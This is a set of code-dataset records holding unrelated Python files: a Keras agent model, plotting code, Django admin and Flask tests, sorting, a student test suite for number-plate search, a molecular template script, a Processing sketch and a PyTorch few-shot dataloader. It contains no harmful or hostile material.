)\n\n\n\n","sub_path":"scrapy_tutorial/jd/jd/spiders/jdbook.py","file_name":"jdbook.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"294905441","text":"import tensorflow as tf\n\n\nclass AgentModel(tf.keras.Model):\n def __init__(self, num_actions, hidden_units, num_states):\n super(AgentModel, self).__init__()\n\n # input layer\n self.input_layer = tf.keras.layers.InputLayer(input_shape=())\n\n self.hidden_layers = []\n for i in hidden_units:\n self.hidden_layers.append(tf.keras.layers.Dense(i, activation='tanh', kernel_initializer='RandomNormal'))\n self.output_layer = tf.keras.layers.Dense(num_actions, activation=\"linear\", kernel_initializer='RandomNormal')\n\n @tf.function\n def call(self, input_shape):\n # Build the network from the selected layers with the correct layer shape\n z = self.input_layer(input_shape)\n for layer in self.hidden_layers:\n z = layer(z)\n output = self.output_layer(z)\n return output\n","sub_path":"gamestate_agent/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"48615138","text":"import numpy as np\nimport pickle\nfrom matplotlib import pyplot as plt\n\ndef error_plots(exp, hermite_errors, ordinary_errors, parval, mapping, threshold):\n errors = [hermite_errors, ordinary_errors]\n points = np.arange(0, parval, 1)\n titles = ['L1 norm error', 'L2 norm error', 'Precision', 'Recall', 'Accuracy', 'F1 score']\n file_name = ['_error_L1', '_error_L2', '_precision', '_recall', '_accuracy', '_F1']\n space = ['Hermite', 'Ordinary']\n\n for sp in range(len(space)):\n for fn in range(len(file_name)):\n fig = plt.figure()\n ax = fig.gca()\n for th in range(threshold.shape[0]):\n if (th == 0):\n plt.plot(points, errors[sp][th][fn], 'bo--', label = 'No threshold')\n else:\n plt.plot(points, errors[sp][th][fn], label='threshold ' + str(threshold[th]))\n plt.title(titles[fn] + ' in ' + space[sp] + ' space in 2D')\n plt.grid()\n ax.set_xticks(points)\n plt.xticks(points, mapping)\n plt.legend(bbox_to_anchor = (1.05, 1), loc = 2, borderaxespad = 0.)\n plt.savefig('./' + exp + '/plots/' + space[sp] + file_name[fn]+ '.pdf', format = 'pdf', bbox_inches='tight')\n plt.close()\n","sub_path":"2dcode/error_plots.py","file_name":"error_plots.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"95136363","text":"# pylint:disable=missing-docstring, invalid-name\n\nfrom json import loads\n\nfrom tests.base import BaseCase\n\n\nclass TestWelcome(BaseCase):\n \"\"\"\n Welcome resource tests.\n \"\"\"\n\n def test_welcome(self):\n response = self.client.get('/')\n expected = {\n 'status': 'success',\n 'data': {\n 'message': 'Welcome to Real Estate Manager.'\n }\n }\n self.assertEqual(expected, loads(response.data))\n self.assertEqual(200, response.status_code)\n","sub_path":"tests/test_views/test_welcome.py","file_name":"test_welcome.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"348420168","text":"from django.contrib import admin\nfrom .models import *\n\n# Register your models here.\n\n\nclass SkillAdmin(admin.ModelAdmin):\n list_display = ('name', 'insufficient', 'weak', 'aimed_at', 'beyond', 'course', 'number_eval', 'slug')\n list_filter = ('course', )\n ordering = ('name', 'course', 'number_eval')\n search_fields = ('name', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n ('General', {\n 'classes': ['collapse', ],\n 'fields': ('name', 'course', 'number_eval', 'slug')\n }),\n # Fieldset 2 : subsidiaires\n ('This skill evaluates : ', {\n 'fields': ('insufficient', 'weak', 'aimed_at', 'beyond')\n }),\n )\n\n prepopulated_fields = {'slug': ('name',), }\n\n\nclass SessionAdmin(admin.ModelAdmin):\n list_display = ('date', 'course', 'number_eval', 'slug')\n list_filter = ('course', )\n date_hierarchy = 'date'\n ordering = ('date', 'course', 'number_eval')\n search_fields = ('course', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n ('General informations', {\n 'fields': ('date', 'course', 'number_eval', 'slug')\n }),\n )\n\n\nclass CourseAdmin(admin.ModelAdmin):\n list_display = ('name', 'slug')\n list_filter = ('professors', 'students')\n ordering = ('name', )\n search_fields = ('name', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n ('General informations', {\n 'classes': ['collapse', ],\n 'fields': ('name', 'professors', 'slug')\n }),\n # Fieldset 2 : subsidiaires\n ('List of students', {\n 'fields': ('students',)\n }),\n )\n\n prepopulated_fields = {'slug': ('name',), }\n\n\nclass SKillEvalAdmin(admin.ModelAdmin):\n list_display = ('skill', 'level', 'eval', 'comment')\n list_filter = ('skill',)\n ordering = ('level', 'skill')\n search_fields = ('skill', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n (\"Contenu de l'évaluation\", {\n 'classes': [\"collapse\", ],\n 'fields': ('skill', 'level', 'eval', 'comment')\n }),\n\n )\n\n\nclass EvaluationAdmin(admin.ModelAdmin):\n list_display = ('session', 'concerned', 'general', 'teacher')\n list_filter = ('concerned', 'teacher')\n ordering = ('concerned', )\n search_fields = ('concerned', 'teacher')\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n (\"Contenu de l'évaluation\", {\n 'classes': [\"collapse\", ],\n 'fields': ('session', 'concerned', 'general', 'teacher')\n }),\n )\n\n\nadmin.site.register(Skill, SkillAdmin)\nadmin.site.register(Session, SessionAdmin)\nadmin.site.register(Course, CourseAdmin)\nadmin.site.register(SkillEvaluation, SKillEvalAdmin)\nadmin.site.register(Evaluation, EvaluationAdmin)\n\n\n\n","sub_path":"xprof/teacher_access/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"129148953","text":"def find_smallest(arr):\n \"\"\"Функция находит наименьший элемент в списке\"\"\"\n smallest = arr[0]\n smallest_index = 0\n for i, el in enumerate(arr[1:], start=1):\n if arr[i] < smallest:\n smallest = arr[i]\n smallest_index = i\n return smallest_index\n\n\ndef selection_sort(arr):\n \"\"\"Функция возвращает отсортированный массив\"\"\"\n new_arr = []\n for i in range(len(arr)):\n smallest = find_smallest(arr)\n new_arr.append(arr.pop(smallest))\n return new_arr\n\n\nprint(selection_sort([5, 6, 3, 2, 7, 8, 1]))\n\n","sub_path":"polygon/grokking_algorithms/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"464785149","text":"\"\"\"\ntests.py\nA module of unit tests to verify your answers\nDon't be too worried if you can't understand how they work.\nYou should be able to understand the output though...\nWe recommend starting testing yourself with small lists of values\nso that you can work out the expected result list and expected number\nof comparisons by hand.\n\nThese unit tests aren't going to be that useful for debugging!\n\"\"\"\n\nimport unittest\nimport math\nimport time\nimport utilities\n\nfrom classes import NumberPlate\nfrom stats import StatCounter\nfrom linear_finder import simple_linear_plate_finder\nfrom binary_finder import simple_binary_plate_finder\n\nTEST_FOLDER = './test_data/'\nTEST_FILE_TEMPLATE = '{n_stolen}-{n_sighted}-{n_matches}-{seed}.txt'\nDEF_SEED = 'a' # default seed\n\nreal_comparisons = StatCounter.get_comparisons\n\n\n\nclass TypeAssertion(object):\n\n def assertTypesEqual(self, a, b):\n if type(a) != type(b):\n template = \"Type {} does not match type {}\"\n error_msg = template.format(type(a), type(b))\n raise AssertionError(error_msg)\n\n\nclass BaseTestMethods(unittest.TestCase, TypeAssertion):\n\n def get_bounds(self, left_length, right_length):\n raise NotImplementedError(\"This method should be \"\n \"implemented by a subclass.\")\n\n def use_sorted_stolen(self):\n \"\"\" The binary test subclass will over write this method\n with one that returns True so that the stolen list\n is sorted before the test is run \"\"\"\n return False\n\n def base_filename(self, n_stolen, n_sighted, n_matches, seed=DEF_SEED):\n if self.use_sorted_stolen():\n n_stolen = str(n_stolen) + 's'\n return TEST_FILE_TEMPLATE.format(n_stolen=n_stolen,\n n_sighted=n_sighted,\n n_matches=n_matches,\n seed=seed)\n\n def check_comparisons_within_bounds(self, student_count, n_stolen, n_sighted, n_matches):\n lower, upper = self.get_bounds(n_stolen, n_sighted, n_matches)\n if not lower <= student_count <= upper:\n template = \"{} is not in range {}-{}\"\n error = template.format(student_count, lower, upper)\n raise AssertionError(error)\n # else everything is fine so do nothing\n\n def plates_test(self, n_stolen, n_sighted, n_matches, seed=DEF_SEED):\n \"\"\" Test that the given matching_function returns the correct\n result for the file specified by test_file_name.\n \"\"\"\n base_file = self.base_filename(n_stolen, n_sighted, n_matches, seed)\n stolen, sightings, expected_list = utilities.read_dataset(\n TEST_FOLDER + base_file)\n\n start = time.perf_counter()\n student_answer, comps = self.matching_function(stolen, sightings)\n end = time.perf_counter()\n delta = end - start\n print('{}, c={}, {:.4f}s'.format(base_file, comps, delta), end=' ... ')\n\n self.assertEqual(student_answer, expected_list)\n if len(student_answer) > 0:\n self.assertTypesEqual(student_answer[0], expected_list[0])\n\n def comparisons_test(self, n_stolen, n_sighted, n_matches,\n expected=None, seed=DEF_SEED):\n \"\"\" Test that the number of comparisons that the student made is\n within the expected bounds (provided by self.get_bounds, or expected)\n \"\"\"\n base_file = self.base_filename(n_stolen, n_sighted, n_matches, seed)\n stolen, sighted, _ = utilities.read_dataset(TEST_FOLDER + base_file)\n\n start = time.perf_counter()\n _, student_count = self.matching_function(stolen, sighted)\n end = time.perf_counter()\n delta = end - start\n print('{}, c={}, {:.4f}s'.format(\n base_file, student_count, delta), end=' ... ')\n\n if expected is not None:\n self.assertEqual(student_count, expected)\n else:\n self.check_comparisons_within_bounds(student_count,\n len(stolen),\n len(sighted),\n n_matches)\n\n def internal_comparisons_test(self,\n n_stolen,\n n_sighted,\n n_matches,\n quiet=False,\n seed=DEF_SEED):\n \"\"\" Test that the student has correctly counted the code against what\n we have counted. This does not mean that the count is correct, just\n that it was correctly counted.\n setting quiet = True means the feedback summary won't be printed,\n which is useful if using along with standard comparisons in\n a single test case.\n \"\"\"\n base_file = self.base_filename(n_stolen, n_sighted, n_matches, seed)\n (stolen, sighted, _) = utilities.read_dataset(TEST_FOLDER + base_file)\n\n start = time.perf_counter()\n _, student_count = self.matching_function(stolen, sighted)\n end = time.perf_counter()\n delta = end - start\n\n # prints student comparisons and time taken\n template = '{}, c={}, {:.4f}s'\n feedback = template.format(base_file, student_count, delta)\n if not quiet:\n print(feedback, end=' ... ')\n\n self.assertEqual(student_count, real_comparisons())\n\n\nclass BaseTester(BaseTestMethods):\n\n def setUp(self):\n \"\"\"Runs before every test case\"\"\"\n StatCounter.reset_comparisons()\n\n\n\n\nclass TinyTests(BaseTester):\n\n #== Tests with a trivially tiny dataset ==#\n def test_010_tiny(self):\n n_stolen, n_sighted, n_matches = 2, 5, 1\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_020_tiny_comps(self):\n n_stolen, n_sighted, n_matches = 2, 5, 1\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_030_tiny_internal_comps(self):\n n_stolen, n_sighted, n_matches = 2, 5, 1\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass SmallTests(BaseTester):\n\n def test_010_small_no_common(self):\n n_stolen, n_sighted, n_matches = 10, 5, 0\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_020_small_no_common_comps(self):\n n_stolen, n_sighted, n_matches = 10, 5, 0\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_030_small_no_common_internal_comps(self):\n n_stolen, n_sighted, n_matches = 10, 5, 0\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_some_common(self):\n n_stolen, n_sighted, n_matches = 5, 10, 2\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_small_some_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 2\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_some_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 2\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_all_common(self):\n n_stolen, n_sighted, n_matches = 5, 10, 5\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_small_all_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 5\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_all_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 5\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass MediumTests(BaseTester):\n\n def test_medium_some_common(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 10\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_some_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 10\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_some_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 10\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_all_common(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_all_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_all_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\n\n\nclass LargeTestsV1(BaseTester):\n\n def test_010_large_no_common(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 0\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_020_large_no_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 0\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_030_large_no_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 20000, 0\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass LargeTestsV2(BaseTester):\n\n def test_large_some_common(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_large_some_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_large_some_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass LargeTestsV3(BaseTester):\n\n def test_large_all_common(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 1000\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_large_all_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 1000\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_large_all_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 1000\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass HugeTestsV1(BaseTester):\n\n def test_huge_none_common(self):\n n_stolen, n_sighted, n_matches = 10000, 20000, 0\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_huge_none_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 10000, 20000, 0\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_huge_none_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 10000, 20000, 0\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass BaseTestLinear(BaseTester):\n \"\"\" Unit tests for the sequential plate finder.\n Overrides the setUp method to set the macthing function.\n Overrides the get_bounds method to give bounds for linear search version.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.matching_function = simple_linear_plate_finder\n\n def get_bounds(self, stolen, seen, matches):\n \"\"\" Note this range is very generous!\n The exact tests will give you a better idea of how\n well your linear function is working\n \"\"\"\n if stolen == matches and stolen < seen:\n lower = matches\n else:\n lower = seen\n return lower, seen * stolen\n\n\n# The following inherit all the base tests and use the methods given in\n# the BaseTestBinary class.\n# Basically it says which function to test and which bounds to use\n# as well as saying to use the files with sorted stolen plates\n# which are obviously needed to be able to do binary searching\n\n\n\nclass TinyLinear(BaseTestLinear, TinyTests):\n pass\n\n\nclass SmallLinear(BaseTestLinear, SmallTests):\n pass\n\n\nclass LargeLinearV1(BaseTestLinear, LargeTestsV1):\n pass\n\n\nclass LargeLinearV2(BaseTestLinear, LargeTestsV2):\n pass\n\n\nclass LargeLinearV3(BaseTestLinear, LargeTestsV3):\n pass\n\n\nclass HugeLinearV1(BaseTestLinear, HugeTestsV1):\n pass\n\n\n# Here we do some extra tests with known values\nclass SmallLinearExact(BaseTestLinear):\n\n def test_010_tiny_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 2, 5, 2, 9\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_020_small_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 10, 0, 100\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_030_small_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 10, 5, 81\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_040_small_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches = 10, 10, 10\n expected = n_stolen * (n_stolen + 1) // 2\n # can you see why expected must be given by the formula above in this case?\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_045_small_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 2, 10, 2, 15\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_048_small_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 5, 10, 5, 35\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_050_small2_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 100, 0, 1000\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_060_small2_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 100, 2, 988\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_070_small2_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches = 100, 100, 100\n expected = n_stolen * (n_stolen + 1) // 2\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_080_small3_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 1000, 10, 9405\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n\nclass MediumLinearExact(BaseTestLinear):\n\n def test_010_medium_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 100, 1000, 0, 100000\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_020_medium_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 100, 1000, 5, 99647\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_030_medium_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 100, 1000, 100, 91050\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n\n\n\nclass LargeLinearExact(BaseTestLinear):\n\n def test_010_large_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10000, 20000, 0, 200000000\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_020_large_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10000, 20000, 1000, 194970008\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_030_large_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 1000, 20000, 1000, 19077500\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n\nclass BaseTestBinary(BaseTester):\n \"\"\" Unit tests for the binary plate search function. \"\"\"\n\n def setUp(self):\n super().setUp()\n self.matching_function = simple_binary_plate_finder\n\n def get_bounds(self, n_stolen, n_sighted, n_matches):\n if n_stolen > 0:\n log_stolen = int(math.log(n_stolen, 2))\n if n_stolen == n_matches and n_stolen < n_sighted:\n lower = n_matches * (log_stolen + 1) - 2\n else:\n lower = n_sighted * (log_stolen + 1) - 2\n upper = n_sighted * (log_stolen + 2) + 2\n else:\n lower = 0\n upper = 0\n return lower, upper\n\n def use_sorted_stolen(self):\n \"\"\" Will use files with sorted stolen plates.\n For example: 10s-10-10-a.txt has the stolen plates in sorted order\n \"\"\"\n return True\n\n\n# The following classes inherit all the base tests and use the methods given in\n# the BaseTestBinary class.\n# Basically it says which function to test and which bounds to use\n# as well as saying to use the files with sorted stolen plates\n# which are obviously needed to be able to do binary searching\n\n\n\nclass TinyBinary(BaseTestBinary, TinyTests):\n pass\n\n\nclass SmallBinary(BaseTestBinary, SmallTests):\n pass\n\n\nclass LargeBinaryV1(BaseTestBinary, LargeTestsV1):\n pass\n\n\nclass LargeBinaryV2(BaseTestBinary, LargeTestsV2):\n pass\n\n\nclass LargeBinaryV3(BaseTestBinary, LargeTestsV3):\n pass\n\n\nclass HugeBinaryV1(BaseTestBinary, HugeTestsV1):\n pass\n\n\ndef all_tests_suite():\n \"\"\" Combines test cases from various classes to make a\n big suite of tests to run.\n You can comment out tests you don't want to run and uncomment\n tests that you do want to run :)\n \"\"\"\n suite = unittest.TestSuite()\n\n # suite.addTest(unittest.makeSuite(TinyLinear))\n # suite.addTest(unittest.makeSuite(SmallLinear))\n # suite.addTest(unittest.makeSuite(LargeLinearV1))\n # suite.addTest(unittest.makeSuite(LargeLinearV2))\n # suite.addTest(unittest.makeSuite(LargeLinearV3))\n # suite.addTest(unittest.makeSuite(HugeLinearV1))\n # suite.addTest(unittest.makeSuite(SmallLinearExact))\n # suite.addTest(unittest.makeSuite(MediumLinearExact))\n # suite.addTest(unittest.makeSuite(LargeLinearExact))\n\n # IMPORTANT NOTE <==================================================================\n # uncomment the following lines when your are ready for binary testing\n suite.addTest(unittest.makeSuite(TinyBinary))\n suite.addTest(unittest.makeSuite(SmallBinary))\n suite.addTest(unittest.makeSuite(LargeBinaryV1))\n suite.addTest(unittest.makeSuite(LargeBinaryV2))\n suite.addTest(unittest.makeSuite(LargeBinaryV3))\n suite.addTest(unittest.makeSuite(HugeBinaryV1))\n return suite\n\n\n\n\ndef main():\n \"\"\" Makes a test suite and runs it. Will your code pass? \"\"\"\n test_runner = unittest.TextTestRunner(verbosity=2)\n all_tests = all_tests_suite()\n test_runner.run(all_tests)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1. Linear & Binary Search/student_files/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":20897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"2482026","text":"import mdtraj as md\n\nmanual_pdbs = ['TDIZ_A.pdb', 'TDIZ_B.pdb']\n\nf = open('templates/templates-resolved-seq.fa', 'w')\n\nfor pdb in manual_pdbs:\n traj = md.load('manual_pdbs/' + pdb)\n protein_atoms = traj.top.select('protein')\n traj = traj.atom_slice(protein_atoms)\n traj.save('templates/structures-resolved/KMT5A_HUMAN_%s.pdb' % pdb.split('.')[0])\n resolved_seq = traj.top.to_fasta()[0]\n f.write('\\n>KMT5A_HUMAN_%s\\n' % pdb.split('.')[0])\n f.write(resolved_seq)\n f.write('\\n')\n \nf.close()\n","sub_path":"APO/setup/SETD8_ensembler_26models/gather_manual_templates.py","file_name":"gather_manual_templates.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"228249560","text":"def argsort(seq):\n return sorted(range(len(seq)), key=seq.__getitem__)\n\ndef networkize(img, n_nodes=300, n_neigh=4, DY=0, n_rings=7):\n img.loadPixels()\n n_good = 0\n XX, YY, CC, RR = [], [], [], []\n while n_good < n_nodes:\n x = int(random(img.width))\n y = int(random(img.height))\n R = random(15, 80)\n ndx = y*img.width + x\n c = color(img.pixels[ndx])\n sat = saturation(c)\n if sat > -1:\n good = True\n for xx, yy in zip(XX, YY):\n d = dist(x, y, xx, yy)\n if d < 15 :\n good = False\n if good:\n XX.append(x)\n YY.append(y)\n CC.append(c)\n RR.append(R)\n n_good += 1\n \n for x, y, c, R in zip(XX, YY, CC, RR):\n r = red(c)\n g = green(c)\n b = blue(c)\n dists = []\n for xx, yy in zip(XX, YY):\n dists.append(dist(x,y,xx,yy))\n dists = argsort(dists)\n for dd in dists[:n_neigh]:\n xx = XX[dd]\n yy = YY[dd]\n cc = CC[dd]\n col = (int(0.5*(r+red(cc))), int(0.5*(g+green(cc))), int(0.5*(b+blue(cc))), 30)\n stroke(*col)\n strokeWeight(2)\n #line(x, y+DY, xx, yy+DY)\n \n for x, y, c, R in zip(XX, YY, CC, RR):\n r = red(c)\n g = green(c)\n b = blue(c)\n dr = R/n_rings\n \n for i in range(n_rings):\n a = random(255)\n stroke(r,g,b,a)\n strokeWeight(random(0,3))\n noFill()\n ellipse(x, y+DY, i*dr, i*dr)\n\n #stroke(0, 0)\n #strokeWeight(1.5)\n #fill(r,g,b,a)\n #ellipse(x, y+DY, R, R)\n img.updatePixels()\n","sub_path":"Citrate droplets/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"604019682","text":"import os\nimport torch\nimport random\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import transforms, utils\nfrom torch.utils.data import Dataset, DataLoader\n\n#openImage = lambda x: Image.open(x)\n\ndef openImage(x):\n img = Image.open(x)\n if len(np.array(img).shape) != 3:\n print(x, len(np.array(img).shape))\n return img\n\nclass EpisodeDataset(Dataset):\n\n def __init__(self, data_root, phase='train', nway=5, kshot=1, kqry=15, transform=None, nepisode=100):\n\n self.data_root = data_root\n self.nway = nway\n self.kshot = kshot\n self.kqry = kqry\n self.nepisode = nepisode\n\n if phase == 'train':\n self.data_root += '/' + phase\n self.transform = transforms.Compose([openImage,\n transforms.Resize((84,84)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ])\n else:\n self.data_root += '/' + phase\n self.transform = transforms.Compose([openImage,\n transforms.Resize((84,84)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ])\n if transform != None:\n self.transform = transform\n\n classes = os.listdir(self.data_root)\n\n self.examples = {}\n for cls in classes:\n self.examples[cls] = [os.path.join(self.data_root, cls, filename) \\\n for filename in os.listdir(os.path.join(self.data_root, cls))]\n\n def __len__(self):\n return self.nepisode\n\n def __getitem__(self, idx):\n\n cls_selected = random.sample(self.examples.keys(), self.nway)\n\n spt = []\n qry = []\n for i, cls in enumerate(cls_selected):\n example_selected = random.sample(self.examples[cls], self.kshot+self.kqry)\n spt += [(i, example) for example in example_selected[:self.kshot]]\n qry += [(i, example) for example in example_selected[self.kshot:]]\n random.shuffle(spt)\n random.shuffle(qry)\n\n spt, qry = np.asarray(spt), np.asarray(qry)\n\n spt_label, spt_img = spt[:,0].astype(np.int64), spt[:,1]\n qry_label, qry_img = qry[:,0].astype(np.int64), qry[:,1]\n\n spt_label, qry_label = torch.from_numpy(spt_label), torch.from_numpy(qry_label)\n\n spt_img = torch.stack([self.transform(filename) for filename in spt_img])\n qry_img = torch.stack([self.transform(filename) for filename in qry_img])\n\n return (spt_img, spt_label), (qry_img, qry_label)\n\n\n","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
